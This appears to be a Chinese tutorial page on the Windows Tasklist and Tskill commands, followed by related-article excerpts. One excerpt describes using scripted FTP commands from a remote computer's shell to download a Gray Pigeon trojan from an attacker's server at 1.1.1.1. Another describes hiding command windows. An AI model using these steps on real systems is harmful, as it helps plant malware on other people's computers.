cmd Tasklist与Tskill管理Windows系统进程_DOS/BAT

命令:Tasklist

  功能:命令用来显示运行在本地或远程计算机上的所有进程,可以监控用户的操作。

  命令格式:

  Tasklist [/S system [/U username [/P [password]]]] [/M [module] | /SVC | /V] [/FI filter] [/FO format] [/NH]

  参数含义

  /S system  指定连接到的远程系统。

  /U [domain\]user 指定使用哪个用户执行这个命令。

  /P [password]  为指定的用户指定密码。

  /M [module]  列出调用指定的DLL模块的所有进程。如果没有指定模块名,显示每个进程加载的所有模块。

  /SVC 显示每个进程中的服务。

  /V 显示详细信息。

  实例分析:

  如果我们只是查看本地主机进程信息,直接办入命令即可。下面的实例是从客户机远程查看内网中某台主机时程信息。

  假如我们有一台服务器:

  内网地址:192.168.0.1,

  管理员帐号:administrator

  管理员密码:password

  我们需要在CMD窗口输入:

  Tasklist /s 192.168.0.1 /u administrator /p password

  这条命令可以使我们方便的查看到远程主机的运行情况,当然前提是保证RPC服务正常启动。

命令:tskill

  功能:用来关掉进程的

  命令格式:

  TSKILL processid | processname [/SERVER:servername] [/ID:sessionid | /A] [/V]

  参数含义

  processid 要结束的进程的 Process ID。

  processname 要结束的进程名称。

  /SERVER:servername 含有 processID 的服务器(默认值是当前值)。

  使用进程名和 /SERVER 时,必须指定

  /ID 或 /A

  /ID:sessionid 结束在指定会话下运行的进程。

  /A 结束在所有会话下运行的进程。

  /V 显示正在执行的操作的信息。

  这个Tskill用法很简单,直接输入Tskill 图象名或PID就可以了。

  偶尔碰上Tskill无法结束的进程,还可以试试Ntsd命令,

  格式为: ntsd -c q -pn {进程名}

  参数含义:

  -c是表示执行debug命令;

  q表示执行结束后退出;

  -p 表示后面紧跟着是你要结束的进程对应的PID;

  -pn 表示后面紧跟着是你要结束的进程名;

时间: 2024-11-03 08:37:49

cmd Tasklist与Tskill管理Windows系统进程_DOS/BAT的相关文章

用批处理一键安装两种扩展名的Windows系统补丁_DOS/BAT

每个人都可能重装过操作系统.可每次安装好操作系统后花费时间最长的就是下载补丁安装补丁了,往往下载补丁安装补丁都花去了大半天的事情,在Vista以后,微软发布的补丁大都是msu的,当然也有少部份还是以前的exe.下面介绍一种针对这两种扩展名的系统补丁快速安装的办法. 借助软件下载最新的系统补丁并保存在spacks文件夹,在该文件夹内新建一文本文件,输入以下代码 @Echo Off Title Install Windows Update pack Echo 正在安装Windows系统补丁,请稍等.

在远程计算机的CMD内下载FTP文件的方法_DOS/BAT

在远程计算机的CMD环境下,如果不能通过IPC$渠道传送文件,那就只有通过FTP下载文件了. 假设我们已经有一个FTP服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数: 1.FTP服务器的IP地址:如1.1.1.1 2.FTP服务器的用户名:如test 3.FTP服务器的密 码:如test123 在远程计算机的CMD下依次输入下面的命令: 1.echo open 1.1.1.1>>test.txt 登陆FTP服务器 2.echo test>

cmd下PUSHD和POPD命令使用说明_DOS/BAT

PUSHD命令保存当前目录以供 POPD 命令使用,然后改到指定的目录. PUSHD [path | ..] path 指定要成为当前目录的目录. 如果命令扩展被启用,除了一般驱动器号和路径,PUSHD 命令还接受网络路径.如果指定了网络路径,PUSHD 将创建一个 指向指定网络资源的临时驱动器号,然后再用刚定义的驱动器 号更改当前的驱动器和目录.可以从 Z: 往下分配临时驱动器 号,使用找到的第一个没有用过的驱动器号. POPD命令 更改到 PUSHD 命令存储的目录. 如果命令扩展被启用,从

Windows运行bat批处理文件时隐藏cmd命令提示符窗口的方法_DOS/BAT

我们在Windows中运行bat批处理文件时往往会弹出一个cmd命令提示符窗口,然后等一会儿cmd窗口就自动关闭了,有人会说,直接在bat批处理文件中加入echo off命令么好了,没错,echo off确实可以关闭cmd窗口,但是cmd窗口最初还是会弹出一下再消失,下面就教大家运行bat批处理文件时如何彻底隐藏cmd命令提示符窗口的方法. 方法就是通过vbs脚本来彻底隐藏执行bat批处理文件,将以下代码保存为.vbs文件,然后直接执行这个.vbs文件即可彻底隐藏cmd窗口了: Set ws =

结束Windows系统进程的方法

进程是程序在计算机上的一次执行活动.当你运行一个程序,你就启动了一个进程.显然,程序是死的(静态的),进程是活的(动态的).进程可以分为系统进程和用户进程.凡是用于完成操作系统的各种功能的进程就是系统进程,它们就是处于运行状态下的操作系统本身;用户进程就是所有由你启动的进程.进程是操作系统进行资源分配的单位.有些进程我们通过"任务管理器"是不能结束的,如果遇到木马怎么办呢?我们可以强行结束这个进程,请看下面介绍的技巧. Windows操作系统中只有System.SMSS.EXE和CSR

如何停止Windows系统进程

  进程是程序在计算机上的一次执行活动.当你运行一个程序,你就启动了一个进程.显然,程序是死的(静态的),进程是活的(动态的).进程可以分为系统进程和用户进程.凡是用于完成操作系统的各种功能的进程就是系统进程,它们就是处于运行状态下的操作系统本身;用户进程就是所有由你启动的进程.进程是操作系统进行资源分配的单位.有些进程我们通过"任务管理器"是不能结束的,如果遇到木马怎么办呢?我们可以强行结束这个进程,请看下面介绍的技巧. Windows操作系统中只有System.SMSS.EXE和C

无敌命令结束Windows系统进程_Windows2003

    进程是程序在计算机上的一次执行活动.当你运行一个程序,你就启动了一个进程.显然,程序是死的(静态的),进程是活的(动态的).进程可以分为系统进程和用户进程.凡是用于完成操作系统的各种功能的进程就是系统进程,它们就是处于运行状态下的操作系统本身:用户进程就是所有由你启动的进程.进程是操作系统进行资源分配的单位.有些进程我们通过"任务管理器"是不能结束的,如果遇到木马怎么办呢?我们可以强行结束这个进程,请看下面介绍的技巧. Windows操作系统中只有System.SMSS.EXE

玩转Windows服务系列——命令行管理Windows服务

原文:玩转Windows服务系列--命令行管理Windows服务 说到Windows服务的管理就不得不说通过命令行的方式管理Windows服务,因为无论是系统管理员,还是通过编程的方式调用cmd命令,命令行都是非常方便以及强大的工具. 接下来就看一下如何通过cmd命令管理Windows服务. 管理Windows服务的主要cmd命令 管理Windows服务的命令应该有很多,但是我所了解到的命令主要有两个:sc.net. 说是两个cmd命令,实际就是windows的system32目录下的两个执行程

Windows WMIC命令使用详解(附实例)_DOS/BAT

执行"wmic"命令启动WMIC命令行环境.这个命令可以在XP或 .NET Server的标准命令行解释器(cmd.exe).Telnet会话或"运行"对话框中执行.这些启动方法可以在本地使用,也可以通过.NET Server终端服务会话使用. 第一次执行WMIC命令时,Windows首先要安装WMIC,然后显示出WMIC的命令行提示符.在WMIC命令行提示符上,命令以交互的方式执行. wimic的运行方式可以有两种法: 1.搞入wimic进入后输入命令运行,键入w